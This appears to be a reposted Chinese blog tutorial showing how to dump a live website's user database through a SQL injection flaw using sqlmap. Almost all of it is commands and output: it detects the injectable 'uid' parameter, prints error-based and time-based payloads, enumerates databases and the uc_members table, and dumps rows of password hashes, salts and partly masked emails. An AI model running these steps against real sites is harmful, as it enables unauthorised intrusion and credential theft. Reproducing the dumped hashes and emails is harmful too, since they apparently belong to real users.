这久十分流行各种扒裤,虽说一般来说都是拿下站以后再用脚本脱,但是有时候不得已可能也需要从注入点脱,这久离不开各种注入工具
杨凡写了穿山甲怎么脱,sqlmap脱裤本来是07写的,我曾经用她脱过,先简单写一个,呵呵
好吧,用一个真实的注入地址来演示(和谐过)
看命令记录:
C:\sqlmap>python sqlmap.py -u http://user.xxoo.org/ucHome/space.php?uid=222
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 17:06:11
[17:06:11] [INFO] using 'C:\sqlmap\output\user.xxoo.org\session' as session file
[17:06:11] [INFO] testing connection to the target url
[17:06:13] [INFO] testing if the url is stable, wait a few seconds
[17:06:14] [INFO] url is stable
[17:06:14] [INFO] testing if GET parameter 'uid' is dynamic
[17:06:14] [INFO] confirming that GET parameter 'uid' is dynamic
[17:06:15] [WARNING] GET parameter 'uid' is not dynamic
[17:06:15] [INFO] heuristic test shows that GET parameter 'uid' might be injectable (possible DBMS: MySQL)
[17:06:15] [INFO] testing sql injection on GET parameter 'uid'
[17:06:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:06:18] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[17:06:18] [INFO] GET parameter 'uid' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[17:06:18] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[17:06:18] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[17:07:18] [INFO] GET parameter 'uid' is 'MySQL > 5.0.11 AND time-based blind' injectable
[17:07:18] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[17:07:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'uid' is vulnerable. Do you want to keep testing the others? [y/N] N
sqlmap identified the following injection points with a total of 34 HTTP(s) requests:
---
Place: GET
Parameter: uid
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: uid=222 AND (SELECT 8621 FROM(SELECT COUNT(*),CONCAT(CHAR(58,111,115,109,58),(SELECT (CASE WHEN (8621=8621) THEN 1 ELSE 0 END)),CHAR(58,119,122,107,58),FLOOR(RAND(0)*2))x FROM informati
on_schema.tables GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: uid=222 AND SLEEP(5)
---
[17:07:26] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.16, Apache 2.2.17
back-end DBMS: MySQL 5.0
[17:07:26] [INFO] Fetched data logged to text files under 'C:\sqlmap\output\user.xxoo.org'
[*] shutting down at: 17:07:26
注意红色的字,说明参数uid存在注入。好吧,发现代码和颜色不能叠加,注意这里:GET parameter 'uid' is vulnerable.
好接下来列出所有数据库:
C:\sqlmap>python sqlmap.py -u http://user.xxoo.org/ucHome/space.php?uid=222 --dbs
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 17:08:57
[17:08:57] [INFO] using 'C:\sqlmap\output\user.xxoo.org\session' as session file
[17:08:57] [INFO] resuming injection data from session file
[17:08:57] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[17:08:57] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: uid
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: uid=222 AND (SELECT 8621 FROM(SELECT COUNT(*),CONCAT(CHAR(58,111,115,109,58),(SELECT (CASE WHEN (8621=8621) THEN 1 ELSE 0 END)),CHAR(58,119,122,107,58),FLOOR(RAND(0)*2))x FROM informati
on_schema.tables GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: uid=222 AND SLEEP(5)
---
[17:08:59] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.16, Apache 2.2.17
back-end DBMS: MySQL 5.0
[17:08:59] [INFO] fetching database names
[17:08:59] [INFO] the SQL query used returns 4 entries
[17:09:00] [INFO] retrieved: information_schema
[17:09:00] [INFO] retrieved: mysql
[17:09:00] [INFO] retrieved: test
[17:09:00] [INFO] retrieved: ucenter
available databases [4]:
[*] information_schema
[*] mysql
[*] test
[*] ucenter
[17:09:00] [INFO] Fetched data logged to text files under 'C:\sqlmap\output\user.xxoo.org'
[*] shutting down at: 17:09:00
红色部分即是列出的数据库(木有颜色,就是available databases [4]: 那里),然后设定数据库,列出表:
C:\sqlmap>python sqlmap.py -u http://user.xxoo.org/ucHome/space.php?uid=222 -D ucenter --tables
结果就不弄出来了,表太多,直接看列出表uc_members的字段名(uchome用户数据都在这里,要扒的就是这个,嘿嘿):
C:\sqlmap>python sqlmap.py -u http://user.xxoo.org/ucHome/space.php?uid=222 -D ucenter -T uc_members --columns
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 17:11:44
[17:11:44] [INFO] using 'C:\sqlmap\output\user.xxoo.org\session' as session file
[17:11:44] [INFO] resuming injection data from session file
[17:11:44] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[17:11:44] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: uid
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: uid=222 AND (SELECT 8621 FROM(SELECT COUNT(*),CONCAT(CHAR(58,111,115,109,58),(SELECT (CASE WHEN (8621=8621) THEN 1 ELSE 0 END)),CHAR(58,119,122,107,58),FL
on_schema.tables GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: uid=222 AND SLEEP(5)
---
[17:11:46] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.16, Apache 2.2.17
back-end DBMS: MySQL 5.0
[17:11:46] [INFO] fetching columns for table 'uc_members' on database 'ucenter'
[17:11:46] [INFO] the SQL query used returns 12 entries
[17:11:46] [INFO] retrieved: uid
[17:11:47] [INFO] retrieved: mediumint(8) unsigned
[17:11:47] [INFO] retrieved: username
[17:11:47] [INFO] retrieved: char(32)
[17:11:47] [INFO] retrieved: password
[17:11:47] [INFO] retrieved: char(32)
[17:11:47] [INFO] retrieved: email
[17:11:48] [INFO] retrieved: char(32)
[17:11:48] [INFO] retrieved: myid
[17:11:48] [INFO] retrieved: char(30)
[17:11:48] [INFO] retrieved: myidkey
[17:11:48] [INFO] retrieved: char(16)
[17:11:48] [INFO] retrieved: regip
[17:11:49] [INFO] retrieved: char(15)
[17:11:49] [INFO] retrieved: regdate
[17:11:49] [INFO] retrieved: int(10) unsigned
[17:11:49] [INFO] retrieved: lastloginip
[17:11:49] [INFO] retrieved: int(10)
[17:11:49] [INFO] retrieved: lastlogintime
[17:11:50] [INFO] retrieved: int(10) unsigned
[17:11:50] [INFO] retrieved: salt
[17:11:50] [INFO] retrieved: char(6)
[17:11:50] [INFO] retrieved: secques
[17:11:50] [INFO] retrieved: char(8)
Database: ucenter
Table: uc_members
[12 columns]
+---------------+-----------------------+
| Column | Type |
+---------------+-----------------------+
| email | char(32) |
| lastloginip | int(10) |
| lastlogintime | int(10) unsigned |
| myid | char(30) |
| myidkey | char(16) |
| password | char(32) |
| regdate | int(10) unsigned |
| regip | char(15) |
| salt | char(6) |
| secques | char(8) |
| uid | mediumint(8) unsigned |
| username | char(32) |
+---------------+-----------------------+
[17:11:51] [INFO] Fetched data logged to text files under 'C:\sqlmap\output\user.xxoo.org'
[*] shutting down at: 17:11:51
不用多说了吧,开始脱裤,我们只需要脱其中的一些字段,然后--threads把线程数调高,用--start和--stop设定要扒的记录范围,我们扒几条记录看看:
C:\sqlmap>python sqlmap.py -u http://user.xxoo.org/ucHome/space.php?uid=222 -D ucenter -T uc_members -C uid,username,password,salt,email --dump --threads=10 --start=1 --stop=50
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 17:14:22
[17:14:22] [INFO] using 'C:\sqlmap\output\user.xxoo.org\session' as session file
[17:14:22] [INFO] resuming injection data from session file
[17:14:22] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[17:14:22] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: uid
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: uid=222 AND (SELECT 8621 FROM(SELECT COUNT(*),CONCAT(CHAR(58,111,115,109,58),(SELECT (CASE WHEN (8621=8621) THEN 1 ELSE 0 END)),CHAR(58,119,122,107,58),FLOOR(RAND(0)*2))x FROM informati
on_schema.tables GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: uid=222 AND SLEEP(5)
---
[17:14:23] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.16, Apache 2.2.17
back-end DBMS: MySQL 5.0
[17:14:23] [INFO] fetching columns 'uid, username, password, salt, email' entries for table 'uc_members' on database 'ucenter'
[17:14:24] [INFO] retrieved: 2
[17:14:24] [INFO] retrieved: xx1@163.com
[17:14:24] [INFO] retrieved: 0a9c9d7451d0e78938747083add7fa5a
[17:14:24] [INFO] retrieved: 001c6f
[17:14:24] [INFO] retrieved: asdf@yeah.net
[17:14:25] [INFO] retrieved: 3
[17:14:25] [INFO] retrieved: xx086@163.com
[17:14:25] [INFO] retrieved: 02b3f6122a2882ffdd9ee9f12be60a6e
[17:14:25] [INFO] retrieved: 44d1f1
[17:14:25] [INFO] retrieved: x520@gmail.com
[17:14:25] [INFO] retrieved: 5
[17:14:25] [INFO] retrieved: xlyb@163.com
[17:14:26] [INFO] retrieved: 97226e4861d8e3251af4256781b78868
[17:14:26] [INFO] retrieved: 297944
[17:14:26] [INFO] retrieved: txen@vip.qq.com
[17:14:26] [INFO] retrieved: 73
[17:14:27] [INFO] retrieved: 0x40@qq.com
[17:14:27] [INFO] retrieved: 7e55a749a63c427a767cb1d9aa826f3b
[17:14:27] [INFO] retrieved: d84a57
[17:14:27] [INFO] retrieved: yx@126.com
[17:14:27] [INFO] retrieved: 74
[17:14:28] [INFO] retrieved: x540@qq.com
[17:14:28] [INFO] retrieved: 10bb282c88331c6e95d14700ba9390f0
[17:14:28] [INFO] retrieved: 589369
[17:14:28] [INFO] retrieved: hx@xxoo.org
[17:14:28] [INFO] retrieved: 75
[17:14:28] [INFO] retrieved: 0x840@qq.com
[17:14:29] [INFO] retrieved: 313bfb31b5cd6e58797291665a7b6ed1
[17:14:29] [INFO] retrieved: 229620
[17:14:29] [INFO] retrieved: fexg@xxoo.org
[17:14:29] [INFO] retrieved: 76
[17:14:29] [INFO] retrieved: 0.4.658940@qq.com
[17:14:29] [INFO] retrieved: 1846282a634da3c90af4e0250931b8c2
[17:14:30] [INFO] retrieved: da5025
[17:14:30] [INFO] retrieved: sxg@xxoo.org
[17:14:30] [INFO] retrieved: 77
[17:14:30] [INFO] retrieved: 0x6540@qq.com
[17:14:30] [INFO] retrieved: 8ff58083e52ad0b45c29daa6e6a92b82
[17:14:30] [INFO] retrieved: 024f42
[17:14:31] [INFO] retrieved: chfn@xxoo.org
[17:14:31] [INFO] retrieved: 78
[17:14:31] [INFO] retrieved: f4540@qq.com
[17:14:31] [INFO] retrieved: 46bbf0639b4195c4a5e0520f3d021315
[17:14:31] [INFO] retrieved: fed606
[17:14:31] [INFO] retrieved: rafg2@gmail.com
[17:14:32] [INFO] retrieved: 79
[17:14:32] [INFO] retrieved: 0.4.687540@qq.com
[17:14:32] [INFO] retrieved: 3de40cc0ba602a744eac8ec5a0da20d9
[17:14:32] [INFO] retrieved: ef16e8
[17:14:32] [INFO] retrieved: 123@123.com
[17:14:32] [INFO] retrieved: 80
[17:14:33] [INFO] retrieved: 0.474.6540@qq.com
[17:14:33] [INFO] retrieved: 2b70f5a5ada849ba5ef6fcdb8e04de82
[17:14:33] [INFO] retrieved: f1750c
[17:14:33] [INFO] retrieved: editfrc@xxoo.org
[17:14:33] [INFO] retrieved: 81
[17:14:33] [INFO] retrieved: f8dna@gmail.com
[17:14:34] [INFO] retrieved: 29ca2bc5046ebd4e84ae42e39ac1ed94
[17:14:34] [INFO] retrieved: 93d41a
[17:14:34] [INFO] retrieved: fanfg@xxoo.org
[17:14:34] [INFO] retrieved: 82
[17:14:34] [WARNING] user aborted during enumeration. sqlmap will display partial output
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] n
Database: ucenter
Table: uc_members
[12 entries]
+----------------------------+----------------------------------+--------+-----+--------------------------+
| email | password | salt | uid | username |
+----------------------------+----------------------------------+--------+-----+--------------------------+
| xxoo@yeah.net | 0a9c9d7451d0e78938747083add7fa5a | 001c6f | 2 | 0-9xx@163.com |
| xxoo@gmail.com | 02b3f6122a2882ffdd9ee9f12be60a6e | 44d1f1 | 3 | 0.1086@163.com |
| xxn@vip.qq.com | 97226e4861d8e3251af4256781b78868 | 297944 | 5 | 0.1lx@163.com |
| xxvv@126.com | 7e55a749a63c427a767cb1d9aa826f3b | d84a57 | 73 | 0.x0@qq.com |
| asdfasd@xxoo.org | 10bb282c88331c6e95d14700ba9390f0 | 589369 | 74 | 0.x546540@qq.com |
|xxg@xxoo.org | 313bfb31b5cd6e58797291665a7b6ed1 | 229620 | 75 | 0.4.6xxx840@qq.com |
| shi_ying@xxoo.org | 1846282a634da3c90af4e0250931b8c2 | da5025 | 76 | 0.4xx940@qq.com |
| chen_shan@xxoo.org | 8ff58083e52ad0b45c29daa6e6a92b82 | 024f42 | 77 | 0xx6540@qq.com |
| rafikixx@gmail.com | 46bbf0639b4195c4a5e0520f3d021315 | fed606 | 78 | 0x4540@qq.com |
| 123@123.com | 3de40cc0ba602a744eac8ec5a0da20d9 | ef16e8 | 79 | x40@qq.com |
| editorc@xxoo.org | 2b70f5a5ada849ba5ef6fcdb8e04de82 | f1750c | 80 | xxx@qq.com |
| fangxg@xxoo.org | 29ca2bc5046ebd4e84ae42e39ac1ed94 | 93d41a | 81 | 0xxa@gmail.com |
+----------------------------+----------------------------------+--------+-----+--------------------------+
[17:14:39] [INFO] Table 'ucenter.uc_members' dumped to CSV file 'C:\sqlmap\output\user.xxoo.org\dump\ucenter\uc_members.csv'
[17:14:39] [INFO] Fetched data logged to text files under 'C:\sqlmap\output\user.xxoo.org'
看见了吧,都在一个csv文件里了,csv文件就是以逗号分割记录的文件,什么excel什么access什么mysql都可以往里面导,比穿山甲的html好吧,嘿嘿。截个图:
好了,就说这么点,sqlmap其实很强大,还是跨平台的哦,亲
转自 f4ck
